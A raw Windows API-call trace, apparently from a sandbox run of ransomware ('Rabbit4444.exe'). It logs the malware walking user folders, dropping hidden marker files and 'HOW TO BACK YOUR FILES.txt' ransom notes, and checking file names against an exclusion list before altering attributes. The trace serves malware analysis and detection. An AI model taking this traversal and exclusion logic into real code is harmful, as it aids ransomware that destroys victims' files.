(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.492] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.495] FlushFileBuffers (hFile=0x27c) returned 1 [0052.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.496] CloseHandle (hObject=0x27c) returned 1 [0052.496] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned 95 [0052.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.496] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0052.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.496] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.496] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.496] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.497] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.497] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.497] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.497] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.497] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.497] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.497] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe89c4c88, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe89c4c88, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.497] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe89c4c88, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe89c4c88, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.497] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0052.497] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.497] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.497] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.498] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.498] CloseHandle (hObject=0x278) returned 1 [0052.498] CloseHandle (hObject=0x27c) returned 1 [0052.498] GetCurrentThreadId () returned 0xd98 [0052.498] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120538 [0052.498] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0052.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0052.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120530 | out: hHeap=0xe0000) returned 1 [0052.498] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0052.498] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0052.498] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3" [0052.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.499] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.504] FlushFileBuffers (hFile=0x27c) returned 1 [0052.505] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.505] CloseHandle (hObject=0x27c) returned 1 [0052.507] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 60 [0052.507] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0052.507] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.507] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.507] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.507] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.507] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.507] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.507] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.507] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.507] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.507] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.507] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe89c4c88, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe89c4c88, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe89eaba8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.507] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.507] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.507] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6243272, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0052.507] lstrcmpiW (lpString1="My", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.507] lstrcmpiW (lpString1="My", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.507] lstrcmpiW (lpString1="My", lpString2="Rabbit4444.exe") returned -1 [0052.507] lstrcmpiW (lpString1="My", lpString2=".") returned 1 [0052.507] lstrcmpiW (lpString1="My", lpString2="..") returned 1 [0052.507] lstrcmpiW (lpString1="My", lpString2="windows") returned -1 [0052.508] lstrcmpiW (lpString1="My", lpString2="bootmgr") returned 1 [0052.508] lstrcmpiW (lpString1="My", lpString2="pagefile.sys") returned -1 [0052.508] lstrcmpiW (lpString1="My", lpString2="boot") returned 1 [0052.508] lstrcmpiW (lpString1="My", lpString2="ids.txt") returned 1 [0052.508] lstrcmpiW (lpString1="My", lpString2="NTUSER.DAT") returned -1 [0052.508] lstrcpyW (in: lpString1=0x130ebb2, lpString2="My" | out: lpString1="My") returned="My" [0052.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1207f0 [0052.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x80) returned 0x101b78 [0052.508] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1207f8 | out: ListHead=0xf68b0, ListEntry=0x1207f8) returned 0x1204d8 [0052.508] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6243272, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0052.508] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0052.508] lstrcpyW (in: lpString1=0x130ebb2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.508] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.509] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.510] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.510] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.510] CloseHandle (hObject=0x278) returned 1 [0052.510] CloseHandle (hObject=0x27c) returned 1 [0052.510] GetCurrentThreadId () returned 0xd98 [0052.510] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1207f8 [0052.510] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0052.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0052.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1207f0 | out: hHeap=0xe0000) returned 1 [0052.510] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0052.510] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0052.510] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3" [0052.510] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.513] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.516] FlushFileBuffers (hFile=0x27c) returned 1 [0052.517] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.517] CloseHandle (hObject=0x27c) returned 1 [0052.518] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 63 [0052.518] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.518] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6328090, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe89eaba8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.518] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.518] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.518] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.518] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.518] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6328090, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe89eaba8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.518] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.518] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.518] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.518] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.518] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.518] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe89eaba8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe89eaba8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a10ec1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.518] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.518] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.518] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc6328090, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc6328090, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc6328090, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppContainerUserCertRead", cAlternateFileName="APPCON~1")) returned 1 [0052.518] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.518] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.518] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="Rabbit4444.exe") returned -1 [0052.518] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2=".") returned 1 [0052.518] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="..") returned 1 [0052.518] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="windows") returned -1 [0052.519] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="bootmgr") returned -1 [0052.519] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="pagefile.sys") returned -1 [0052.519] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="boot") returned -1 [0052.519] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ids.txt") returned -1 [0052.519] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="NTUSER.DAT") returned -1 [0052.519] lstrcpyW (in: lpString1=0x130ebb8, lpString2="AppContainerUserCertRead" | out: lpString1="AppContainerUserCertRead") returned="AppContainerUserCertRead" [0052.519] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead", dwFileAttributes=0x20) returned 1 [0052.519] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead", dwFileAttributes=0x4) returned 1 [0052.519] lstrlenW (lpString="AppContainerUserCertRead") returned 24 [0052.519] lstrlenW (lpString="Rabbit4444") returned 10 [0052.519] lstrcmpiW (lpString1="erCertRead", lpString2="Rabbit4444") returned -1 [0052.519] lstrlenW (lpString=".dll") returned 4 [0052.519] lstrcmpiW (lpString1="Read", lpString2=".dll") returned 1 [0052.519] lstrlenW (lpString=".lnk") returned 4 [0052.519] lstrcmpiW (lpString1="Read", lpString2=".lnk") returned 1 [0052.519] lstrlenW (lpString=".ini") returned 4 [0052.519] lstrcmpiW (lpString1="Read", lpString2=".ini") returned 1 [0052.519] lstrlenW (lpString=".sys") returned 4 [0052.520] lstrcmpiW (lpString1="Read", lpString2=".sys") returned 1 [0052.520] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62a3729f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3b6c131, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x62a3729f, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="Rabbit4444.exe") returned -1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="windows") returned -1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="bootmgr") returned 1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="pagefile.sys") returned -1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="boot") returned 1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="ids.txt") returned -1 [0052.520] lstrcmpiW (lpString1="Certificates", lpString2="NTUSER.DAT") returned -1 [0052.520] lstrcpyW (in: lpString1=0x130ebb8, lpString2="Certificates" | out: lpString1="Certificates") returned="Certificates" [0052.520] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", dwFileAttributes=0x2010) returned 1 [0052.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120630 [0052.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0xefd18 [0052.520] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120638 | out: ListHead=0xf68b0, ListEntry=0x120638) returned 0x1204d8 [0052.520] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc5fe0cd1, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c4d7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc5fe0cd1, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0052.520] lstrcmpiW (lpString1="CRLs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.520] lstrcmpiW (lpString1="CRLs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.520] lstrcmpiW (lpString1="CRLs", lpString2="Rabbit4444.exe") returned -1 [0052.520] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1 [0052.520] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1 [0052.520] lstrcmpiW (lpString1="CRLs", lpString2="windows") returned -1 [0052.521] lstrcmpiW (lpString1="CRLs", lpString2="bootmgr") returned 1 [0052.521] lstrcmpiW (lpString1="CRLs", lpString2="pagefile.sys") returned -1 [0052.521] lstrcmpiW (lpString1="CRLs", lpString2="boot") returned 1 [0052.521] lstrcmpiW (lpString1="CRLs", lpString2="ids.txt") returned -1 [0052.521] lstrcmpiW (lpString1="CRLs", 